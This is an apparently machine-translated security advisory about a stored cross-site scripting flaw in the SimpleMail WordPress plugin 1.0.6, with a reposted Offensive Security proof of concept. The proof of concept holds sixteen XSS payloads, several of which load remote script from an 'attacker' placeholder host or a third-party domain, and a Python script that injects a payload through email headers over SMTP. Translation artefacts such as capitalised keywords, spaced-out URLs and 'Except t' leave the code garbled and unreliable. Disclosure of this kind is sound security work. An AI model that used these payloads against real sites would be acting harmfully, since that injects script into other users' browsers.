WordPress is a Blog (Blog, Blog) engine developed using the PHP language and MySQL database. you can create your own Blog on servers that support PHP and MySQL databases.
SimpleMail plugin for WordPress 1.0.6 and other versions have multiple vulnerabilities in implementation, the input passed through the email fields "To", "From", "Date", and "Subject" are not properly filtered To display emails, attackers can exploit this vulnerability to execute script insertion attacks. After viewing the vulnerability, the vulnerability will be executed in the browser of the affected site.
WordPress SimpleMail Plugin Email field script insertion Vulnerability
Refer:
Http://secunia.com/advisories/50208/
Http://www.exploit-db.com/exploits/20361/
Loneferret () provides the following test methods:
#! /Usr/bin/python
"'
Author: loneferret of Offensive Security
Product: SimpleMail
Version: 1.0.6 (free version)
Vendor Site: http://codecanyon.net/item/wp-simplemail/1130008? Ref = tinsley
Software Download: http://wordpress.org/extend/plugins/wp-simplemail/
Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received ed from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure
Installed On: Ubuntu lamps 8.04
WordPress: 3.3.1
Client Test OS: mac OS Lion
Browser Used: Firefox 12
Injection Points: To, From, Date, Subject
Injection Payload (s ):
1: '; alert (String. fromCharCode (88,83, 83) // \ '; alert (String. fromCharCode (88,83, 83) // "; alert (String. fromCharCode (88,83, 83) // \ "; alert (String. fromCharCode (88,83, 83) //-> </SCRIPT> "> '> <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT >= &{}
2: <SCRIPT> alert ('xsss') </SCRIPT>
3: <script src = http: // attacker/xss. js> </SCRIPT>
4: <SCRIPT> alert (String. fromCharCode (88,83, 83) </SCRIPT>
5: <iframe src = "javascript: alert ('xss');"> </IFRAME>
6: <script src = http://www.bkjia.com/uploads/allianz 131120/1625105p6-1.jpg"> </SCRIPT>
7: </TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>
8: <script src = // attacker/. j> www.2cto.com
9: <SCRIPT> alert ("XSS"); // </SCRIPT>
10: <SCRIPT> alert ("XSS") </SCRIPT> ">
11: <SCRIPT a = ">" SRC = "http: // attacker/xss. js"> </SCRIPT>
12: <SCRIPT = "blah" SRC = "http: // www.2cto.com/xss. js"> </SCRIPT>
13: <SCRIPT a = "blah" "SRC =" http: // attacker/xss. js "> </SCRIPT>
14: <SCRIPT "a = '>'" SRC = "http: // attacker/xss. js"> </SCRIPT>
15: <SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http: // attacker/xss. js"> </SCRIPT>
16: <SCRIPT a = "> '>" SRC = "http: // attacker/xss. js"> </SCRIPT>
"'
Import smtplib, urllib2
Payload = "" <SCRIPT> alert ('xss') </SCRIPT> """
Def sendMail (dstemail, frmemail, smtpsrv, username, password ):
Msg = "From: hacker@offsec.local" + payload + "\ n"
Msg + = "To: victim@victim.local \ n"
Msg + = 'date: Today \ r \ N'
Msg + = "Subject: Offensive Security \ n"
Msg + = "Content-type: text/html \ n"
Msg + = "XSS \ r \ n"
Server = smtplib. SMTP (smtpsrv)
Server. login (username, password)
Try:
Server. sendmail (frmemail, dstemail, msg)
Except t Exception, e:
Print "[-] Failed to send email :"
Print "[*]" + str (e)
Server. quit ()
Username = hacker@offsec.local"
Password = 123456 ″
Dstemail = victim@victim.local"
Frmemail = hacker@offsec.local"
Smtpsrv = "172.16.84.171 ″
Print "[*] Sending Email"
SendMail (dstemail, frmemail, smtpsrv, username, password)
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version.